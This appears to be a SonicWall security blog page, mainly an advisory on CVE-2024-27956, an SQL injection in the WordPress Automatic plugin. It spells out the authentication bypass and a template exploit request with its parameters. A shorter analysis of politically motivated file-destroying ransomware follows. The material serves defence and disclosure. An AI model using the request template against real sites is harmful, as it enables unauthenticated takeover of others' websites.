
Technical Overview

This vulnerability allows threat actors to circumvent the authentication mechanism by sending a crafted SQL query to the web server.

The WordPress Automatic plugin, developed by Valvepress, is popularly known for automatically posting content from any website. It can import content from popular sites like YouTube, Flickr, Vimeo, Twitter and other social media platforms utilizing the APIs from almost any website. It can also generate content using OpenAI’s ChatGPT.

CVE-2024-27956 arose due to improper neutralization of special elements used in an SQL Command. This allows unauthenticated actors to bypass the normal authentication process and inject SQL code that grants them elevated system privileges. This further allows nefarious activists to create admin‑level user accounts, upload malicious files and take full control of affected sites. Out of the 5.5 million attacks observed, as reported by HackerNews in the last week of March 2024, it was observed that attackers changed the name of the vulnerable file “inc/csv.php” and renamed sensitive files to prevent the site owner or fellow hackers from controlling the hijacked site. Once a WordPress site is under their control, attackers ensure the longevity of their access by creating backdoors and modifying the code.

Triggering the Vulnerability

The flaw exists in “inc/csv.php”, which generally resides under the plugin installation directory. A typical path to the vulnerable file is “/wp‑content/plugins/wp‑automatic/inc/csv.php”. It is also shown in our PoC demonstration in Figure 2.

WP users can supply any random SQL query to the $q variable, as shown in Figure 1. This variable will be further executed on line 32 of  Figure 1, with $wpdb->get_results( $q).

Figure 1: inc/csv.php

Prior to execution, there are basic authentication and integrity checks.

  • The first check involves the $current_user->user_pass This value would be an empty string if an unauthenticated user accessed the file.
  • The second check needs only the MD5 value of the supplied SQL query to the $integ since $current_user->user_pass is an empty string.
  • Additionally, before the two checks, there is a check of if(wp_automatic_trim($auth == ”)), which means one can’t just input an empty string to the $auth.
  • To bypass this, an attacker can supply a single whitespace (” “) to the $auth as &auth=%00 and achieve an arbitrary SQL query execution.

An example POST request to trigger the vulnerability would look like:

http[:]//target-ip:port/wp-content/plugins/wp-automatic/inc/csv.php

q={{query}}&auth=%00&integ={{md5query}}

With the authentication parameter containing whitespace, as shown in Figure 2.

Exploiting the Vulnerability

To exploit the issue, a WordPress setup with ValvePress’ vulnerable WordPress automatic plugin (< 3.92.1 version) is needed. An attacker only needs to be able to access the instance remotely which could be over the internet or a local network.  A working PoC with a crafted SQL query aids in exploiting this vulnerability.

A demonstration of exploitation based on the publicly available PoC can be seen in Figure 2 (below).

Figure 2: CVE-2024-27956 Exploitation

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:

IPS: 19918 – WordPress Automatic Plugin SQL Injection

Remediation Recommendations

Considering the severe consequences of this vulnerability and the trending of nefarious activists trying to  leverage the exploit in the wild, users are strongly encouraged to update their instances to WP automatic plugin version 3.92.1 or later to remove the vulnerability.

Relevant Links

Politically Charged Ransomware Weaponized as a File Destroyer

The SonicWall Capture Labs threat research team has been observing a growth of malware built using the Chaos ransomware builder. The sample we have analyzed here is built using this kit, however, it is not intended to work as traditional ransomware, but rather, as a file destroyer. The intent appears to be the destruction of files in response to Italy’s stance on the Israel-Palestine conflict. It purports to be created on behalf of the Italian Socialist Party and is likely aimed at infecting machines within the Italian government’s infrastructure.

Infection Cycle

The malware uses the following icon:

Upon infection, files on the system are encrypted. Each file is given a file extension consisting of four random alphanumeric characters. As this malware is intended to destroy files, the decryption key is probably not stored by the attackers for file retrieval later on in exchange for money. A file named “Leggimi.txt” (“Read me” in Italian) is dropped into directories containing encrypted files. It contains the following message in Italian:

A rough translation of that message is as follows:

—————————- -Ransomware route

Italy must be punished for its alliance with the fascist state
By Israel, this malware was scheduled by Marxisti-Leninisti-Maoisti
To spread the anti -medical thought. Of the Palestinians are dying for Your actions, I will kill your files. There is no way to recover them.

Palestine Libera
Italy Red Unit and Socialists

The message makes no mention of file decryption for payment and no contact information is presented. Any encrypted files are therefore irretrievable.

Reverse engineering the malware reveals a list of targeted file extensions:

We can also see a list of directories that are targeted:

An image file is embedded in the malware executable file. It is base64 encoded:

After decoding the image, it is displayed as the desktop wallpaper:

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Cambiare_Rotta.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.